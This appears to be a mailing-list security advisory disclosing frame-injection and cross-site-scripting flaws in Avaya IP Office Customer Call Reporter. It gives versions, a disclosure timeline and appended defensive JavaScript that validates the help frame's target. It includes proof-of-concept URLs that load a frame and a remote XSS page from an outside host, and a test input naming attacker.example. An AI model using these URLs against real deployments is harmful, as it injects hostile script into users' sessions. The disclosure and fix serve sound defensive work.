Hello list!

I want to warn you about vulnerabilities in Avaya IP Office Customer Call Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site Scripting) vulnerabilities.

After I found multiple vulnerabilities in Avaya IP Office Customer Call Reporter in December, I informed ZDI about them (the critical ones). ZDI was very slow in processing these holes (despite my reminders), and only on 30 July did they begin actively working on them. I wrote about this case with ZDI in the WASC Mailing List (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html).

When Avaya ignored my notification in July and ZDI stopped working on this case in August (since Avaya was not responding to them either), I published these two vulnerabilities (the least critical ones). There are many other vulnerabilities, including critical holes which allow taking control of the admin panel, so Avaya still has a chance to get the details of the vulnerabilities in their product before public disclosure.

-------------------------
Affected products:
-------------------------

Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in December 2012), 9.0.0.0 (tested recently) and previous versions.

-------------------------
Affected vendors:
-------------------------

Avaya Inc.
http://www.avaya.com

----------
Details:
----------

Remote HTML Include (Frame Injection) (WASC-12):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua

Remote XSS Include (Cross-Site Scripting) (WASC-08):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html

------------
Timeline:
------------

2012.12.06 - found multiple vulnerabilities (these ones and other critical holes).
2012.12.13 - informed ZDI about other critical vulnerabilities.
2012.12.18 - again informed ZDI about other critical vulnerabilities.
2013.01.27 - registered at zerodayinitiative.com and informed them through the site. ZDI started working on the case.
2013.07.28 - informed Avaya (via two contact forms) about these holes and other critical vulnerabilities, due to the slowness of ZDI.
2013.07.29 - wrote about ZDI in the WASC Mailing List.
2013.07.30 - if earlier ZDI only pretended to work on the case, this time they started working on it actively (and tried to contact Avaya).
2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was not responding.
2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
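Both advisories above come from the same weakness: the help index page takes a frame target from the query string and loads it unchecked, so a protocol-relative value such as //host points the frame at a foreign site. The following is an added example of the client-side check that closes that hole; it is not Avaya's code, and HELP_BASE, DEFAULT_TOPIC and resolveHelpTarget are assumed names for illustration.

```javascript
// Hypothetical base of the help directory; every frame target must stay
// below it. DEFAULT_TOPIC is what the frame shows when the query is bad.
const HELP_BASE = "https://site.example/CCRWebClient/Help/en-US/";
const DEFAULT_TOPIC = "welcome.htm";

// Return the URL the help frame is allowed to load for a query string such
// as window.location.search ("?topic.htm"). Anything that is absolute,
// protocol-relative ("//host"), carries a scheme (javascript:, data:, ...),
// or escapes the help folder via ".." falls back to the default topic.
function resolveHelpTarget(rawQuery) {
  const fallback = HELP_BASE + DEFAULT_TOPIC;
  let topic;
  try {
    // Decode once so "%2F%2Fhost" is caught like "//host"; malformed
    // percent-encoding throws and is treated as a bad request.
    topic = decodeURIComponent((rawQuery || "").replace(/^\?/, ""));
  } catch (e) {
    return fallback;
  }
  if (!topic) return fallback;
  // Reject scheme prefixes, leading "/" or "\" (browsers treat "\" as "/"),
  // and backslashes anywhere, leaving only plain relative paths.
  if (/^[a-z][a-z0-9+.-]*:/i.test(topic) || /^[\\/]/.test(topic) ||
      topic.includes("\\")) {
    return fallback;
  }
  // Resolve against the help base and confirm the result did not leave it;
  // this also catches "../" traversal out of the help directory.
  let resolved;
  try {
    resolved = new URL(topic, HELP_BASE);
  } catch (e) {
    return fallback;
  }
  return resolved.href.startsWith(HELP_BASE) ? resolved.href : fallback;
}

// Demonstration on constructed inputs: an injected foreign host is refused,
// a topic inside the help folder is served.
console.log(resolveHelpTarget("?//attacker.example"));
console.log(resolveHelpTarget("?topics/reports.htm"));
```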